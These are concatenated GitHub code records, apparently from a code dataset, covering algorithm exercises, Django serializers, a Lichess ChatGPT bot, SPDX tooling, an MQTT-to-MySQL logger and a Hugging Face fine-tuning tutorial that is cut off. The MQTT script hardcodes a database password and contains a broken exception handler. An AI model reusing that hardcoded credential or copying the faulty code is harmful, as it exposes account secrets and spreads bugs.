num\n res += num * units\n else:\n res += units * (truckSize - temp)\n break\n i += 1\n return res\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n\n\nif __name__ == '__main__':\n boxTypes = [[1, 3], [2, 2], [3, 1]]\n truckSize = 4\n result = Solution().maximumUnits(boxTypes, truckSize)\n print(result)\n\n boxTypes = [[5, 10], [2, 5], [4, 7], [3, 9]]\n truckSize = 10\n result = Solution().maximumUnits(boxTypes, truckSize)\n print(result)\n","repo_name":"zh805/algorithm","sub_path":"leetcode/python/leetcode/editor/cn/[1710]卡车上的最大单元数.py","file_name":"[1710]卡车上的最大单元数.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2810897993","text":"from Extensions import Extensions\nimport logging\nimport base64\n\ntry:\n import openai\nexcept ImportError:\n import sys\n import subprocess\n\n subprocess.check_call([sys.executable, \"-m\", \"pip\", \"install\", \"openai\"])\n import openai\n\n\nclass dalle(Extensions):\n def __init__(\n self,\n OPENAI_API_KEY: str = \"\",\n **kwargs,\n ):\n self.OPENAI_API_KEY = OPENAI_API_KEY\n if self.OPENAI_API_KEY:\n self.commands = {\n \"Generate Image with DALLE\": self.generate_image_with_dalle\n }\n\n async def generate_image_with_dalle(\n self, prompt: str, filename: str = \"image.png\"\n ) -> str:\n image_path = f\"./WORKSPACE/{filename}\"\n openai.api_key = self.OPENAI_API_KEY\n response = openai.Image.create(\n prompt=prompt,\n n=1,\n size=\"256x256\",\n response_format=\"b64_json\",\n )\n logging.info(f\"Image Generated for prompt:{prompt}\")\n image_data = base64.b64decode(response[\"data\"][0][\"b64_json\"])\n with open(image_path, mode=\"wb\") as png:\n png.write(image_data)\n # REturn base64 image\n encoded_image_data = base64.b64encode(image_data).decode(\"utf-8\")\n return f\"#GENERATED_IMAGE:{encoded_image_data}\"\n","repo_name":"Josh-XT/AGiXT","sub_path":"agixt/extensions/dalle.py","file_name":"dalle.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":2174,"dataset":"github-code","pt":"53"} +{"seq_id":"25533718105","text":"wynik=0\r\na=1\r\n\r\nwhile a<4:\r\n x=int(input(\"Podaj liczbę parzystą dodatnią: \"))\r\n if x%2==0 and x>0:\r\n wynik+=x\r\n else:\r\n print(\"Podałeś złą liczbę\")\r\n continue\r\n print(\"Aktualny wynik dodawania to: \",wynik)\r\n a+=1\r\n","repo_name":"sandrakorcz/PYTHON","sub_path":"PYTHON/zadanie10-wyborliczb.py","file_name":"zadanie10-wyborliczb.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13977036837","text":"import os\nimport random\nimport subprocess\nfrom collections import deque\nfrom collections.abc import Callable\n\nimport chess\nimport chess.engine\nimport chess.gaviota\nimport chess.polyglot\nimport chess.syzygy\nfrom chess.variant import find_variant\n\nfrom aliases import DTM, DTZ, Message, Offer_Draw, Outcome, Performance, Resign, UCI_Move\nfrom api import API\nfrom botli_dataclasses import Game_Information\nfrom enums import Game_Status, Variant\n\nfrom ChatChess import ChatChess\n\nclass ChatGPT_Engline: # placeholder engine to use in chat\n def __init__(self):\n self.id = {\"name\": \"ChatGPT using ChatChess\"}\n\nclass Lichess_Game:\n def __init__(self, api: API, game_information: Game_Information, config: dict) -> None:\n self.config = config\n self.api = api\n self.game_info = game_information\n self.white_time_ms = game_information.state['wtime']\n self.black_time_ms = game_information.state['btime']\n self.status = Game_Status(game_information.state['status'])\n self.draw_enabled: bool = config['engine']['offer_draw']['enabled']\n self.resign_enabled: bool = config['engine']['resign']['enabled']\n self.ponder_enabled: bool = True\n self.out_of_book_counter = 0\n self.opening_explorer_counter = 0\n self.out_of_opening_explorer_counter = 0\n self.cloud_counter = 0\n self.out_of_cloud_counter = 0\n self.chessdb_counter = 0\n self.out_of_chessdb_counter = 0\n consecutive_draw_moves = config['engine']['offer_draw']['consecutive_moves']\n self.draw_scores: deque[chess.engine.PovScore] = deque(maxlen=consecutive_draw_moves)\n consecutive_resign_moves = config['engine']['resign']['consecutive_moves']\n self.resign_scores: deque[chess.engine.PovScore] = deque(maxlen=consecutive_resign_moves)\n self.last_message = 'No eval available yet.'\n\n # New / edited variables\n\n self.engine = ChatGPT_Engline()\n self.board = self._setup_board()\n self.bot = self.setupChatGPT()\n\n # ChatGPT functions\n\n def setupChatGPT(self):\n bot = ChatChess.Game(self.config[\"API_key\"])\n bot.maxTokens = self.config[\"GPT_Settings\"][\"Max_tokens\"]\n bot.maxFails = self.config[\"GPT_Settings\"][\"Max_fails\"]\n bot.maxTime = self.config[\"GPT_Settings\"][\"Max_time\"]\n return bot\n\n def make_move(self) -> tuple[UCI_Move, Offer_Draw, Resign]:\n self.bot.board = self.board\n\n resign = False\n\n try:\n self.bot.getGPTMove()\n self.last_message = self.bot.message\n move = self.bot.move[\"ChatGPT\"][\"uci\"]\n except:\n self.last_message = \"ERROR - ChatGPT could not respond\"\n resign = True\n move = self.board.parse_san(str(self.board.legal_moves).split(\"(\")[1].split(\",\")[0])\n\n print(self.last_message)\n\n return move.uci(), False and self.draw_enabled, resign and True\n\n def update(self, gameState_event: dict) -> bool:\n self.status = Game_Status(gameState_event['status'])\n\n moves = gameState_event['moves'].split()\n if len(moves) <= len(self.board.move_stack):\n return False\n\n self.board.push(chess.Move.from_uci(moves[-1]))\n self.white_time_ms = gameState_event['wtime']\n self.black_time_ms = gameState_event['btime']\n\n return True\n\n # Other functions\n\n @property\n def is_our_turn(self) -> bool:\n return self.game_info.is_white == self.board.turn\n\n @property\n def is_game_over(self) -> bool:\n return self.board.is_checkmate() or \\\n self.board.is_stalemate() or \\\n self.board.is_insufficient_material() or \\\n self.board.is_fifty_moves() or \\\n self.board.is_repetition()\n\n @property\n def is_abortable(self) -> bool:\n return len(self.board.move_stack) < 2\n\n @property\n def is_finished(self) -> bool:\n return self.status != Game_Status.STARTED\n\n def _setup_board(self) -> chess.Board:\n board = chess.Board() # ChatGPT can only play standard\n\n for uci_move in self.game_info.state['moves'].split():\n board.push_uci(uci_move)\n\n return board\n\n # Functions associated with engine called in other files\n\n def end_game(self) -> None:\n return\n\n def start_pondering(self):\n return\n","repo_name":"Tmate6/Lichess_ChatGPT_ChatBot","sub_path":"lichess_game.py","file_name":"lichess_game.py","file_ext":"py","file_size_in_byte":4367,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"43630553225","text":"# coding: utf-8\nfrom rest_framework import serializers\n\nfrom project.models import ProjectCourse\nfrom student_course.models import Review, ReviewCourse, ConfirmCourse, ChangeCourseRecord\n\n\nclass ReviewSerializer(serializers.ModelSerializer):\n class Meta:\n model = Review\n fields = ['id', 'student', 'student_server', 'remark', 'create_time', 'modified_time']\n\n\nclass ReviewCourseSerializer(serializers.ModelSerializer):\n class Meta:\n model = ReviewCourse\n fields = ['id', 'course_code', 'student_id', 'course_name', 'school', 'remark', 'review', 'status',\n 'course', 'review_certificate', 'real_name', 'create_time', 'modified_time']\n\n def create(self, validated_data):\n pass\n\n\nclass ConfirmCourseSerializer(serializers.ModelSerializer):\n class Meta:\n model = ConfirmCourse\n fields = ['id', 'course_code', 'course_name', 'school', 'remark', 'student', 'create_time', 'project_course',\n 'score', 'modified_time', 'status', 'convert_status', 'score_enter_time', 'grade', 'image',\n 'recipient_number', 'sending_date']\n\n def to_representation(self, instance):\n data = super().to_representation(instance)\n project_course = data['project_course']\n names = ProjectCourse.objects.filter(id=project_course).values('project__name', 'course__name',\n 'start_time').first()\n data['project_name'] = names['project__name']\n data['real_name'] = names['course__name']\n data['start_time'] = names['start_time']\n return data\n\n\nclass ChangeCourseRecordSerializer(serializers.ModelSerializer):\n class Meta:\n model = ChangeCourseRecord\n fields = ['id', 'student', 'student_server', 'course_code', 'course_name', 'create_time', 'project', 'school',\n 'course', 'modified_time', 'change_type', 'extra']\n","repo_name":"liaochenghao/studentsys","sub_path":"student_course/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74656867687","text":"# encoding=utf-8\n\"\"\"\n@Time : 2020/1/10 16:42 \n@Author : LiuYanZhe\n@File : demo2.py\n@Software: PyCharm\n@Description: 极坐标系\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# 数据\nx1 = np.arange(-2 * np.pi, 2 * np.pi, 0.1)\nx2 = np.arange(0, 2 * np.pi, 0.02)\nprint('x2:', x2)\n\n# 创建画布\nfig = plt.figure(figsize=(8, 7)) # 创建一个画板,设定大小,后期添加子图\nfig.subplots_adjust(top=0.95, bottom=0.05) # 设置画板\n# 添加子图\nax1 = fig.add_subplot(2, 2, 1) # 添加一个子图,将画板分成1行5列,该子图为第1个,直角坐标系\nax2 = fig.add_subplot(2, 2, 2, polar=True) # 添加一个子图,横1纵3,第2个,极坐标系\nax3 = fig.add_subplot(2, 2, 3, polar=True) # 添加一个子图,横1纵3,第3个,极坐标系\nax4 = fig.add_subplot(2, 2, 4, polar=True) # 添加一个子图,横1纵3,第3个,极坐标系\n# 绘制\nax1.plot(x1, np.sin(x1))\nax1.plot(x1, np.cos(x1))\nax2.plot(x2, np.ones_like(x2)) # np.ones_like()函数返回1,类型和输入值类型相同\nax2.plot(x2, x2 / 6, linestyle='--', lw=1.5) # lw为线宽\nax3.plot(x2, np.sin(x2), color='b', alpha=0.7, linestyle='-.')\nax3.plot(x2, np.cos(x2), color='g', linestyle=':')\nax4.plot(x2, np.cos(4 * x2))\nax4.plot(x2, np.cos(5 * x2), linestyle='--')\n# 设置子图\nax4.set_rgrids(np.arange(0.1, 2, 0.4), angle=45) # 设置网格\n# ax4.set_yticks(np.arange(0.1, 2, 0.4)) # 与上面效果相同\n# 保存图像\nplt.savefig('./pic/demo2.png', dpi=400, bbox_inches='tight')\n# 显示画布\nplt.show()\n","repo_name":"lyz21/MachineLearning","sub_path":"matplotlib/demo2.py","file_name":"demo2.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6452655022","text":"import paho.mqtt.client as mqttClient\nimport time\nimport datetime\nimport pymysql\n\ndef on_message(client, userdata, message):\n print(\"Inside on_message function\")\n print(\"Message received: \" + str(message.payload.decode(\"utf-8\")))\n\n sql = \"insert into sensor_values(timestamp,sm,wl,n,p,k) values(%s,%s,%s,%s,%s,%s)\"\n\n msg = str(message.payload.decode(\"utf-8\"))\n sensor_values = msg.split(\":\")\n sm = sensor_values[0]\n wl = sensor_values[1]\n n = sensor_values[2]\n p = sensor_values[3]\n k = sensor_values[4]\n timestamp = str(datetime.datetime.now())\n timestamp = timestamp[0:19]\n tuple = (timestamp,sm,wl,n,p,k)\n print(tuple)\n try:\n cursor.execute(sql,tuple)\n db.commit()\n #sleep(20000)\n except e:\n print(\"exception has come\")\n\n print(\"after inserting db record\")\n\n\nbroker_address= \"192.168.0.5\" #Broker address\nport = 1883 #Broker port\n\ndb = pymysql.connect(db=\"smartlab\", user=\"pi\", passwd=\"lunatics@92\",unix_socket=\"/var/run/mysqld/mysqld.sock\")\n\ncursor = db.cursor()\n\nclient = mqttClient.Client(\"edgenode\") #create new instance\nclient.on_message= on_message #attach function to callback\nclient.connect(broker_address, port=port) #connect to broker\n#print(\"Connection established\")\n\nclient.loop_start() #start the loop\n#print(\"After loop start statement\")\nclient.subscribe(\"esp8266\")\n#print(\"After subscribe\")\n\ntry:\n while True:\n time.sleep(60)\n\n\nexcept KeyboardInterrupt:\n print(\"exiting..\")\n db.close()\n client.disconnect()\n client.loop_stop()\n\n\n","repo_name":"shravan002/SIH-2019","sub_path":"sih_fnode_homedir/mqtt_test_v5.py","file_name":"mqtt_test_v5.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"19154474563","text":"# function converts from temperature in Celsius to Fahrenheit\r\ndef convert_from_celsius_to_fahrenheit(celsius):\r\n fahrenheit = (celsius * 9 / 5) + 32\r\n return fahrenheit\r\n\r\n\r\n# ask the user for current Celsius temperature\r\nprompted_celsius = float(input(\"Enter the Celsius temperature: \"))\r\nfahrenheit_output = convert_from_celsius_to_fahrenheit(prompted_celsius)\r\nprint(\"The temperature in Fahrenheit is: \", fahrenheit_output)\r\n","repo_name":"hiyorijl/applied_calculus_with_python","sub_path":"class 1/2_ fahreinhein.py","file_name":"2_ fahreinhein.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71604507688","text":"from collections import OrderedDict\nimport pytest\nfrom typing import Dict, Tuple, Any\n\nfrom polytropos.actions.translate.__document import DocumentValueProvider\nfrom polytropos.actions.translate.trace.__trace_document import TraceDocumentValueProvider\nfrom polytropos.ontology.track import Track\nfrom polytropos.actions.translate import Translator\n\n@pytest.fixture()\ndef source() -> Tuple[Dict, Dict]:\n doc: Dict = {\n \"first_source_folder\": {\n \"name\": \"Steve\",\n \"color\": \"red\"\n },\n \"second_source_folder\": {\n \"name\": \"Bob\",\n \"color\": \"blue\"\n }\n\n }\n\n spec: Dict = {\n \"source_folder_1\": {\n \"name\": \"first_source_folder\",\n \"data_type\": \"Folder\",\n \"sort_order\": 0\n },\n \"source_name_1\": {\n \"name\": \"name\",\n \"data_type\": \"Text\",\n \"parent\": \"source_folder_1\",\n \"sort_order\": 0\n },\n \"source_color_1\": {\n \"name\": \"color\",\n \"data_type\": \"Text\",\n \"parent\": \"source_folder_1\",\n \"sort_order\": 1\n },\n \"source_folder_2\": {\n \"name\": \"second_source_folder\",\n \"data_type\": \"Folder\",\n \"sort_order\": 1\n },\n \"source_name_2\": {\n \"name\": \"name\",\n \"data_type\": \"Text\",\n \"parent\": \"source_folder_2\",\n \"sort_order\": 0\n },\n \"source_color_2\": {\n \"name\": \"color\",\n \"data_type\": \"Text\",\n \"parent\": \"source_folder_2\",\n \"sort_order\": 1\n },\n\n }\n return spec, doc\n\n@pytest.fixture\ndef target() -> Tuple[Dict, Tuple[\"OrderedDict[str, Any]\", \"OrderedDict[str, Any]\"]]:\n translate_doc: OrderedDict[str, Any] = OrderedDict([\n (\"the_list\", [\n OrderedDict([\n (\"name\", \"Steve\"),\n (\"color\", \"red\")\n ]),\n OrderedDict([\n (\"name\", \"Bob\"),\n (\"color\", \"blue\")\n ])\n ])\n ])\n\n trace_doc: OrderedDict[str, Any] = OrderedDict([\n (\"the_list\", [\n OrderedDict([\n (\"name\", \"source_name_1\"),\n (\"color\", \"source_color_1\")\n ]),\n OrderedDict([\n (\"name\", \"source_name_2\"),\n (\"color\", \"source_color_2\")\n ])\n ])\n ])\n\n spec: Dict = {\n \"target_list\": {\n \"name\": \"the_list\",\n \"data_type\": \"List\",\n \"sort_order\": 0,\n \"sources\": [\"source_folder_1\", \"source_folder_2\"],\n },\n \"target_list_name\": {\n \"name\": \"name\",\n \"data_type\": \"Text\",\n \"parent\": \"target_list\",\n \"sort_order\": 0,\n \"sources\": [\"source_name_1\", \"source_name_2\"]\n },\n \"target_list_color\": {\n \"name\": \"color\",\n \"data_type\": \"Text\",\n \"parent\": \"target_list\",\n \"sort_order\": 1,\n \"sources\": [\"source_color_1\", \"source_color_2\"]\n }\n }\n\n return spec, (translate_doc, trace_doc)\n\n\n@pytest.mark.parametrize(\n \"index, create_document_value_provider\", enumerate([DocumentValueProvider, TraceDocumentValueProvider])\n)\ndef test_list_from_folders(source, target, index, create_document_value_provider):\n source_spec, source_doc = source\n target_spec, expected = target\n source_track: Track = Track.build(source_spec, None, \"Source\")\n target_track: Track = Track.build(target_spec, source_track, \"Target\")\n translate: Translator = Translator(target_track, create_document_value_provider)\n actual: OrderedDict[str, Any] = translate(\"composite_id\", \"period\", source_doc)\n assert actual == expected[index]\n\n\n@pytest.mark.parametrize(\n \"create_document_value_provider, expected\", [\n (DocumentValueProvider, OrderedDict([\n (\"the_list\", [\n OrderedDict([\n (\"name\", \"Steve\"),\n (\"color\", \"red\")\n ])\n ])\n ])),\n (TraceDocumentValueProvider, OrderedDict([\n (\"the_list\", [\n OrderedDict([\n (\"name\", \"source_name_1\"),\n (\"color\", \"source_color_1\")\n ])\n ])\n ]))]\n)\ndef test_folder_null_skipped(source, target, create_document_value_provider, expected):\n \"\"\"On occasion, e-files contain that would normally contain list items. These are converted to\n JSON as {\"EmptyElement\": null} and are not included as list items during translation.\"\"\"\n source_spec, source_doc = source\n source_doc[\"second_source_folder\"] = None\n target_spec, _ = target\n source_track: Track = Track.build(source_spec, None, \"Source\")\n target_track: Track = Track.build(target_spec, source_track, \"Target\")\n translate: Translator = Translator(target_track, create_document_value_provider)\n actual: OrderedDict[str, Any] = translate(\"composite_id\", \"period\", source_doc)\n assert actual == expected\n","repo_name":"borenstein/polytropos","sub_path":"test/test_functional/translate/test_10_list_from_folders_test.py","file_name":"test_10_list_from_folders_test.py","file_ext":"py","file_size_in_byte":5079,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"20383336398","text":"# -- IF Statements --\n# Similar indenting notation to for loops\n# if, elif, else\n\n\ncars = ['audi', 'bmw', 'subaru', 'toyota']\n\n# for car in cars:\n# \tif len(car) == 3:\n# \t\tprint(f'{car.title()} has 3 letters!')\n# \telse:\n# \t\tprint(f'{car.title()} does not have 3 letters!')\n\n# Case is taken into account when comparing\ncar = 'Audi'\n# car == 'audi' // => False\n\n# and = &&\n# or = ||\n\nband_users = ['Tim', 'Bill', 'Jessica']\n# if 'Christian' not in band_users:\n# \tprint(f'Christian is safe to go in!')\n\n# If vs. elif\n# \t- Multiple if's will test all conditions\n# \t- Multiple elif's will stop at the first met condition\n\nempty_list = []\n# if empty_list:\n# \tprint('list is not empty')\n# if not empty_list:\n# \tprint('list is empty')","repo_name":"SenseiCain/python_crash_course","sub_path":"syntax/if_statements.py","file_name":"if_statements.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"253288988","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nSolution for day18 2021\n\"\"\"\n\n__author__ = 'Guido Minieri'\n__license__ = 'GPL'\n\n\nwith open('input.txt', 'r') as f:\n data = f.read().splitlines()\n\nfrom functools import reduce\nfrom itertools import permutations\n\ndef parse(data):\n flatlist = []\n for line in data:\n flatline, depth = [], 0\n for c in line:\n if c == '[':\n depth += 1\n elif c == ']':\n depth -= 1\n elif c.isdigit():\n flatline.append([int(c), depth])\n flatlist.append(flatline)\n return flatlist\n\ndef split(pair):\n for i, (num, depth) in enumerate(pair):\n if num < 10:\n continue\n down = num // 2\n up = num - down\n return True, pair[:i] + [[down, depth+1],[up, depth+1]] + pair[i+1:]\n return False, pair\n\ndef explode(pair):\n for i, ((num1, depth1), (num2, depth2)) in enumerate(zip(pair, pair[1:])):\n if depth1 < 5 or depth1 != depth2:\n continue\n if i > 0:\n pair[i - 1][0] += num1\n if i < len(pair) - 2:\n pair[i + 2][0] += num2\n return True, pair[:i] + [[0, depth1 - 1]] + pair[i + 2:] \n return False, pair\n\ndef add(a, b):\n pair = [[num, depth+1] for num,depth in a + b]\n while True:\n change, pair = explode(pair)\n if change:\n continue\n change,pair = split(pair)\n if not change:\n break\n return pair\n\ndef magnitude(pair):\n while len(pair) > 1:\n for i, ((num1, depth1), (num2, depth2)) in enumerate(zip(pair, pair[1:])):\n if depth1 != depth2:\n continue\n val = num1 * 3 + num2 * 2\n pair = pair[:i]+[[val, depth1-1]]+pair[i+2:]\n break\n return pair[0][0]\n\nflatlist = parse(data)\n# pt 1\nprint(magnitude(reduce(add, flatlist)))\n# pt 2\nprint(max(magnitude(add(a, b)) for a, b in permutations(flatlist, 2)))\n","repo_name":"gmnr/advent-of-code","sub_path":"2021/18/day18.py","file_name":"day18.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7308669408","text":"from io import StringIO\nfrom typing import Optional\n\nfrom spdx_tools.spdx.model.document import CreationInfo\nfrom spdx_tools.spdx.model.file import File\nfrom spdx_tools.spdx.model.package import Package\nfrom spdx_tools.spdx.model.snippet import Snippet\nfrom spdx_tools.spdx.writer.tagvalue.creation_info_writer import write_creation_info\nfrom spdx_tools.spdx.writer.tagvalue.file_writer import write_file\nfrom spdx_tools.spdx.writer.tagvalue.package_writer import write_package\nfrom spdx_tools.spdx.writer.tagvalue.snippet_writer import write_snippet\n\nfrom opossum_lib.constants import (\n PURL,\n SPDX_FILE_IDENTIFIER,\n SPDX_PACKAGE_IDENTIFIER,\n SPDX_SNIPPET_IDENTIFIER,\n)\nfrom opossum_lib.opossum_file import OpossumPackage, SourceInfo\n\n\ndef _get_purl(package: Package) -> Optional[str]:\n for external_reference in package.external_references:\n if external_reference.reference_type == PURL:\n return external_reference.locator\n return None\n\n\ndef create_package_attribution(package: Package) -> OpossumPackage:\n package_data = StringIO()\n write_package(package, package_data)\n source = SourceInfo(SPDX_PACKAGE_IDENTIFIER)\n package_attribution = OpossumPackage(\n source=source,\n packageName=package.name,\n url=str(package.download_location),\n packageVersion=package.version,\n packagePURLAppendix=_get_purl(package),\n copyright=str(package.copyright_text),\n comment=package_data.getvalue(),\n licenseName=str(package.license_concluded),\n )\n\n return package_attribution\n\n\ndef create_file_attribution(file: File) -> OpossumPackage:\n file_data = StringIO()\n write_file(file, file_data)\n source = SourceInfo(SPDX_FILE_IDENTIFIER)\n file_attribution = OpossumPackage(\n source=source,\n packageName=file.name.split(\"/\")[-1],\n copyright=str(file.copyright_text),\n comment=file_data.getvalue(),\n licenseName=str(file.license_concluded),\n )\n return file_attribution\n\n\ndef create_snippet_attribution(snippet: Snippet) -> OpossumPackage:\n snippet_data = StringIO()\n write_snippet(snippet, snippet_data)\n source = SourceInfo(SPDX_SNIPPET_IDENTIFIER)\n snippet_attribution = OpossumPackage(\n source=source,\n packageName=snippet.name,\n copyright=str(snippet.copyright_text),\n comment=snippet_data.getvalue(),\n licenseName=str(snippet.license_concluded),\n )\n\n return snippet_attribution\n\n\ndef create_document_attribution(\n creation_info: CreationInfo,\n) -> OpossumPackage:\n creation_info_data = StringIO()\n write_creation_info(creation_info, creation_info_data)\n source = SourceInfo(creation_info.spdx_id)\n document_attribution = OpossumPackage(\n source=source,\n packageName=creation_info.name,\n licenseName=creation_info.data_license,\n comment=creation_info_data.getvalue(),\n )\n\n return document_attribution\n","repo_name":"opossum-tool/opossum.lib.py","sub_path":"src/opossum_lib/attribution_generation.py","file_name":"attribution_generation.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24329735907","text":"from django.test import TestCase\nfrom django.urls import reverse, resolve\nfrom pages.views import index, about \n\nclass TestUrls(TestCase):\n\n def test_home_page_status_code(self):\n url = reverse('index')\n print(resolve(url))\n self.assertEquals(resolve(url).func, index)\n\n def test_about_page_status_code(self):\n url = reverse('about')\n print(resolve(url))\n self.assertEquals(resolve(url).func,about)\n\n","repo_name":"Miirkey/mycake_project","sub_path":"mycake/tests/test_urls.py","file_name":"test_urls.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18524901583","text":"# dict is used to store key:value pairs \ndef list_to_dict():\n keys = [1,2,3]\n values = [\"a\", \"b\", \"c\"]\n result=dict(zip(keys, values))\n print(result)\n\ndef l_to_d():\n k=[1,2,3]\n v=[\"a\", \"b\", \"c\"]\n r=dict(zip(k,v))\n print(r)\n\n#list_to_dict()\nl_to_d()\n\n\n# tuple is a collection of objects separated by comma\ndef dict_to_tuple():\n d={1: 'a', 2: 'b', 3: 'c'}\n for i in d.items():\n print(i)\n\ndict_to_tuple()","repo_name":"feimvnc/ml-python","sub_path":"exercises/list_to_dict/list_to_dict.py","file_name":"list_to_dict.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74112335848","text":"from datasets import load_dataset, load_metric\n\n# 每个数据集都由一个文本特征(评论的文本)和一个标签特征(表示评论的好坏)组成。\ntask = \"imdb\"\n\ndataset = load_dataset(task)\n\nprint(dataset)\n\"\"\"\nDatasetDict({\n train: Dataset({\n features: ['text', 'label'],\n num_rows: 25000\n })\n test: Dataset({\n features: ['text', 'label'],\n num_rows: 25000\n })\n unsupervised: Dataset({\n features: ['text', 'label'],\n num_rows: 50000\n })\n})\n\"\"\"\n\n\n########################\n\n# IMDb数据集的通用基准指标是准确率,所以这里使用 datasets 库的 load_metric 函数来加载 metric 脚本,稍后可以与 compute 方法一起使用。\nmetric = load_metric(\"accuracy\")\n\nmetric.compute(predictions=[0,0,1,1], references=[0,1,1,1])\n# {'accuracy': 0.75}\n\n\n########################\n# 下载的数据集有训练和测试拆分,但我们还需要拆分出验证集来判断模型在训练期间表现以避免过拟合。\n#\n# 使用train_test_split 应用于 test_size = 0.3 进行拆分:这会产生一个包含 70% 原始样本的新训练集和一个包含 30% 原始样本的验证集。\nsplitted_datasets = dataset[\"train\"].train_test_split(test_size=0.3)\nprint(splitted_datasets)\n\"\"\"\nDatasetDict({\n train: Dataset({\n features: ['text', 'label'],\n num_rows: 17500\n })\n test: Dataset({\n features: ['text', 'label'],\n num_rows: 7500\n })\n})\n\"\"\"\n\n# 接下来使用 Hugging Face的AutoTokenizer 类加载 BERT Tokenizer。\n#\n# 本文实际上加载 DistilBERT 作为 快速替代方案,如果需要加载 BERT,代码基本是相同的(即将 distilbert-base-uncased 替换为 Bert-base-uncased)。\n# DistilBERT 是一种小型、快速、廉价和轻量级的 Transformer 模型,通过蒸馏 BERT 基础进行训练。\n# 根据 GLUE 语言理解基准测试,它的参数比 Bert-base-uncased 少 40%,运行速度提高 60%,同时保持 BERT 95% 以上的性能。\n\n\n\nfrom transformers import AutoTokenizer\n\nmodel_checkpoint = \"distilbert-base-uncased\"\n\n# use_fast: Whether or not to try to load the fast version of the tokenizer.\n# Most of the tokenizers are available in two flavors: a full python\n# implementation and a “Fast” implementation based on the Rust library 🤗 Tokenizers.\n# The “Fast” implementations allows a significant speed-up in particular\n# when doing batched tokenization, and additional methods to map between the\n# original string (character and words) and the token space.\n\n# 默认:/Users/liguodong/.cache/huggingface/transformers\n\ntokenizer = AutoTokenizer.from_pretrained(model_checkpoint, cache_dir= \"./temp\",use_fast=True)\n\nprint(tokenizer([\"Hello, this one sentence!\"]))\n# {'input_ids': [[101, 7592, 1010, 2023, 2028, 6251, 999, 102]], 'attention_mask':\n# [[1, 1, 1, 1, 1, 1, 1, 1]]}\n# input_ids: the tokenizer vocabulary indexes of the tokenized input sentence\n# attention_mask: 0 if the corresponding input_id is padding, 1 otherwise\n\n# input_ids:分词输入句子的分词器词汇索引。\n# attention_mask:一个由 1 和 0 组成的数组,其中 0 表示发生填充的位置。\n\n# input_ids 和 attention_mask 都将被输入 DistilBERT 模型中。\n\n\n\ndef preprocess_function_batch(examples):\n # truncation=True: truncate to the maximum acceptable input length for\n # the model.\n return tokenizer(examples[\"text\"], truncation=True)\n\n# batched=True: use this if you have a mapped function which can efficiently\n# handle batches of inputs like the tokenizer\nsplitted_datasets_encoded = splitted_datasets.map(preprocess_function_batch, batched=True)\n\"\"\"\nDatasetDict({\n train: Dataset({\n features: ['text', 'label', 'input_ids', 'attention_mask'],\n num_rows: 17500\n })\n test: Dataset({\n features: ['text', 'label', 'input_ids', 'attention_mask'],\n num_rows: 7500\n })\n})\n\"\"\"\n\n# 现在可以使用 AutoModelForSequenceClassification 类及其 from_pretrained 方法加载预训练的 BERT。\n# 这里要使用num_label = 2 参数,因为现在需要在是二分类任务上微调 BERT,\n# 我们将重新生成的head部分,用一个随机初始化的带有两个标签的分类头替换原始层(其权重将在训练期间学习)\n\n\n\n\n\nfrom transformers import TrainingArguments, Trainer\nfrom transformers import AutoModelForSequenceClassification\n\n# num_labels: number of labels to use in the last layer added to the model,\n# typically for a classification task.\n\n# The AutoModelForSequenceClassification class loads the\n# DistilBertForSequenceClassification class as underlying model. Since\n# AutoModelForSequenceClassification doesn't accept the parameter 'num_labels',\n# it is passed to the underlying class DistilBertForSequenceClassification, which\n# accepts it.\n\nmodel = AutoModelForSequenceClassification.from_pretrained(model_checkpoint, num_labels=2, cache_dir= \"./temp\")\n\n# This will issue a warning about some of the pretrained weights not being used\n# and some weights being randomly initialized. That’s because we are throwing\n# away the pretraining head of the BERT model to replace it with a classification\n# head which is randomly initialized. We will fine-tune this model on our task,\n# transferring the knowledge of the pretrained model to it (which is why doing\n# this is called transfer learning).\n\n# 在编写训练代码之前,需要启动 TensorBoard,这样可以获得模型的实时训练信息。\n\n# 启动 TensorBoard 时,logdir 参数应该代表 Hugging Face 写入模型训练日志的目录。\n\nmodel_output_dir = f\"{model_checkpoint}-finetuned-{task}\"\nprint(model_output_dir) # distilbert-base-uncased-finetuned-imdb\n\n# Start TensorBoard before training to monitor it in progress\n# %load_ext tensorboard\n# %tensorboard --logdir '{model_output_dir}'/runs\n\n# 启动时,TensorBoard 面板将显示当前没有可用的仪表板。如果在模型训练期间刷新此页面则会查看到一些实时的数据。\n\n\n# 接下来是配置一些训练参数。代码片段中已经为每个参数添加说明。\n\n# output_dir 存储最终模型的位置。\n# 